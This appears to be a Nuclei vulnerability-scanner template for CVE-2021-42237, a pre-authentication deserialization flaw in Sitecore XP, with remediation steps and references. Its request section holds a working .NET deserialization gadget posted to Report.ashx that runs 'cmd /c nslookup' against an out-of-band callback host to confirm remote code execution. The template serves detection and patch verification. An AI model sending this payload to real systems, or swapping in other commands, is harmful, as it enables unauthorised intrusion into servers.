id: CVE-2021-42237 info: name: Sitecore Experience Platform Pre-Auth RCE author: pdteam severity: critical description: Sitecore XP 7.5 to Sitecore XP 8.2 Update 7 is vulnerable to an insecure deserialization attack where remote commands can be executed by an attacker with no authentication or special configuration required. remediation: For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. - Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below. - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. reference: - https://blog.assetnote.io/2021/11/02/sitecore-rce/ - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776 - https://nvd.nist.gov/vuln/detail/CVE-2021-42237 - http://sitecore.com - http://packetstormsecurity.com/files/164988/Sitecore-Experience-Platform-XP-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42237 cwe-id: CWE-502 epss-score: 0.97286 epss-percentile: 0.9981 cpe: cpe:2.3:a:sitecore:experience_platform:7.5:-:*:*:*:*:*:* metadata: max-request: 1 vendor: sitecore product: experience_platform shodan-query: http.title:"SiteCore" tags: packetstorm,cve,cve2021,rce,sitecore,deserialization,oast,kev http: - raw: - | POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml foo 2 <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0" xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic" xmlns:a="http://schemas.datacontract.org/2004/07/System"> mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 Compare System.String System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] Start System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 System.Diagnostics.Process System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] System.Diagnostics.Process Start(System.String, System.String) System.Diagnostics.Process Start(System.String, System.String) 8 Int32 Compare(System.String, System.String) System.Int32 Compare(System.String, System.String) 8 2 /c nslookup {{interactsh-url}} cmd matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms DNS Interaction words: - "dns" - type: word part: body words: - "System.ArgumentNullException" # digest: 4b0a00483046022100a801649be8f42b380d8b0bffa3d41fd5ec7dd5647e4ba90ef08acb640d719a08022100bb23532aa340db1a73a1f4b7309bedb539d3c7f6d91c8b9f136b6a8a97b9a660:922c64590222798bb761d5b6d8e72950